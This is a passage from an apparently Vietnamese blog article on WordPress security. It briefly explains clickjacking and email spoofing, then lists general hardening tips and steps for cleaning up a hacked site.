Clickjacking (hoặc "click-hijacking") là một kỹ thuật độc hại. Trong kỹ thuật này, kẻ tấn công chiếm đoạt một nút, một liên kết hoặc một hình ảnh bằng cách chồng một liên kết (trong suốt hoặc không trong suốt), biết rằng bạn sẽ nhấp vào nó. Mục tiêu của kiểu tấn công này là khiến bạn nhấp vào liên kết vô hình thay vì cho phép bạn nhấp vào đối tượng dự định của trang web.

Kết quả là, kẻ tấn công có thể thực hiện các lệnh nguy hiểm hoặc truy cập vào thông tin bí mật. Người dùng Plesk có thể là nạn nhân của clickjacking khi Plesk được mở trong iframe trên các trang web độc hại.

6.12. Giả mạo (Spoofing).

Bạn có nhận được một email lạ từ một người thân (hoặc thậm chí là email từ chính bạn)? Đừng trả 520 đô la bitcoin vào một tài khoản không xác định mà không suy nghĩ: bạn chắc chắn là nạn nhân của hành vi giả mạo. Đây là một phương pháp giả mạo địa chỉ email người gửi.

Kiểu tấn công này rất phổ biến và đôi khi đáng tin cậy. Thông thường, hacker cố gắng khiến bạn tin những điều thực sự hoàn toàn sai, anh ta có thông tin về bạn, một người thân yêu cần bạn, v.v.

7. Mẹo ngăn chặn tấn công web WordPress.

Để ngăn trang web của bạn bị nhiễm vi rút và có thể bảo vệ nó khỏi các kiểu tấn công này, bạn nên sử dụng các plugin và giao diện có uy tín. Có những giải pháp đã được thử nghiệm bởi người dùng của cộng đồng WordPress (tham khảo các bài đánh giá) và tương thích với giao diện bạn đã chọn cho trang web của mình.

Việc dọn dẹp một trang WordPress bị tấn công có thể rất khó khăn và sẽ cần đến sự can thiệp của chuyên gia. Họ có thể giúp bạn kiểm tra các rủi ro bảo mật trên trang web của mình. Ví dụ: họ có thể tìm kiếm mã độc hại, liên kết đáng ngờ, chuyển hướng đáng ngờ, phiên bản WordPress, v.v.

Thật bình thường khi WordPress là mục tiêu của tin tặc. Vì người ta ước tính rằng khoảng một phần ba (35%) các trang web hiện đang chạy WordPress.

Tuy nhiên, có một số bước bạn có thể thực hiện để bảo vệ mình khỏi những rủi ro tiềm ẩn. Dưới đây là một số điều cơ bản và được biết đến nhiều nhất mà mình muốn chia sẻ với bạn.

• Thay đổi ID quản trị (Admin) mặc định khi cài đặt WordPress.
• Hạn chế quyền truy cập vào trang quản trị WordPress của bạn. Chặn tất cả các địa chỉ IP đăng nhập vào trang quản trị WordpPess và chỉ cho những địa chỉ IP của người quản trị vào danh sách trắng.
• Thực hiện nâng cấp WordPress của bạn ngay khi chúng có sẵn.
• Sử dụng phiên bản cập nhật mới nhất của PHP.
• Sử dụng mật khẩu mạnh. Các chữ cái viết hoa và viết thường thay thế, số, v.v.
• Chỉ lấy các mẫu giao diện từ các nguồn đáng tin cậy và được đề xuất.
• Tương tự đối với các plugin. Tránh những người nghi ngờ và / hoặc những plugin không còn được hỗ trợ.

Nếu WordPress cho thấy rằng một plugin đã không được cập nhật trong nhiều năm, đó có thể là một vi phạm tiềm năng.

• Trước khi cài đặt một plugin, hãy nghiên cứu và tìm hiểu về độ tin cậy của nó.
• Hủy kích hoạt và gỡ cài đặt các plugin mà bạn không còn sử dụng nữa.
• Nghiêm ngặt chỉ sử dụng các plugin mà bạn thực sự cần.
• Sử dụng giao thức HTTPS an toàn thay vì HTTP.
• Quét trang web của bạn bằng các công cụ quét như Securi.
• Thực hiện sao lưu thường xuyên bằng một plugin đáng tin cậy (ví dụ: Jetpack) hoặc ở phía máy chủ.
• Hủy kích hoạt các tài khoản không hoạt động của các nhân viên cũ đang truy cập trang web.
• Đừng để khách truy cập đăng bình luận mà không có sự chấp thuận của họ.
• Không cho phép tải tập tin lên từ trang web.
• Tiếp tục theo dõi hoạt động của người dùng trên trang web của bạn hàng tuần.

8. Các bước làm sạch trang web WordPress.

• Di chuyển trang web của bạn sang một lưu trữ mới an toàn và hiệu quả: Một lưu trữ mới cung cấp khả năng bảo vệ và bảo mật tối ưu cho trang web của bạn.
• Quét toàn bộ trang web của bạn: Điều này cho phép xác định vấn đề tại nguồn để giải quyết nó tốt hơn.
• Dọn dẹp trang web: Xóa các tập tin gian lận và thông báo cho Google khi trang web của bạn tuân thủ. Việc dọn dẹp trang web của bạn kéo dài 24 giờ và 48 giờ.
• Triển khai các công cụ bảo mật và phòng chống các cuộc tấn công mới: Cài đặt và cấu hình các công cụ bảo mật hiệu suất cao để giảm thiểu nguy cơ tái diễn sự cố như vậy. Cách tiếp cận này nhằm mục đích phòng ngừa và không phản ứng gián tiếp khác.
• Khuyến nghị để bảo mật trang web trong tương lai: Sau khi dọn dẹp trang web WordPress bị tấn công, bạn cần tuân theo các khuyến nghị bảo mật hơn nữa trang web của bạn trước vi rút, phần mềm độc hại và các loại tấn công khác.
• Thay đổi tất cả các mật khẩu cũ: Thay đổi toàn bộ các mật khẩu có liên quan.
• Theo dõi và bảo trì: Khi trang web của bạn được làm sạch 100%, bạn thường xuyên bảo trì, cập nhật các bản cập nhật, sao lưu và quét bảo mật cần thiết để nó hoạt động bình thường và bảo mật.